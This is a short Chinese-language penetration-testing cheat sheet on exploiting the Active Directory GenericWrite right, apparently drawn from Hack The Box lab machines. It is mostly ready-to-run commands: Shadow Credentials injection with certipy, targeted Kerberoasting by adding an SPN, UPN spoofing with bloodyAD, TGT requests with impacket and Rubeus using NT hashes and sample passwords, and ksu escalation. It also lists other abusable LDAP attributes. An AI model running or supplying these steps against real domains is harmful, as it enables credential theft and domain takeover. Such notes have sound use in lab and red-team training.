GenericWrite
GenericWrite权限授予对目标对象未受保护的LDAP属性的完全写入权限
1. 快速利用
1.1. Shadow Credentials
通过修改msDS-KeyCredentialLink属性,进行PKINIT证书注入,无需密码获取哈希
#kerberos认证
certipy shadow auto -k -no-pass -dc-ip '172.16.20.1' -target DC-01.darkcorp.htb -dc-host DC-01.darkcorp.htb -account 'angela.w'
#密码 认证
certipy shadow auto -username 'p.agila@fluffy.htb' -p 'prometheusx-303' -account 'victim' -dc-ip 10.10.11.69
修改servicePrincipalName属性,添加一个SPN,使其变得可以被Kerberoasting
targetedKerberoast.py -v -d "$DC_HOST" -u "$USER" -p "$PASSWORD"
这里
-d不要用FQDN.如果报错,可以加--dc-host
1.3. UPN Spoofing
通过修改userPrincipalName ,用于 Kerberos 冒充的 UPN欺骗, 可以进行Linux SSH 绕过 (通过 NT_ENTERPRISE)
#修改UPN
bloodyAD -u john.w -k --dc-ip 172.16.20.1 --host DC-01.darkcorp.htb -d darkcorp.htb set object angela.w userPrincipalName -v angela.w.adm
#获取NT_ENTERPRIS类型的TGT
mpacket-getTGT -hashes :957246c8137069bca672dc6aa0af7c7a -principalType 'NT_ENTERPRISE' darkcorp.htb/angela.w.adm
#或者使用rubeus
.\Rubeus.exe asktgt /user:Administrator /password:SuperSecret! /principaltype:enterprise
#通过Ksu进行kerberos认证提权
KRB5CCNAME=angela.w.adm.ccache ksu angela.w.adm
1.4. 其他Ldap属性
unicodePwd :修改后可以重置密码,但是受到现代AD的防护
msDS-AllowedToActOnBehalfOfOtherIdentity :RBCD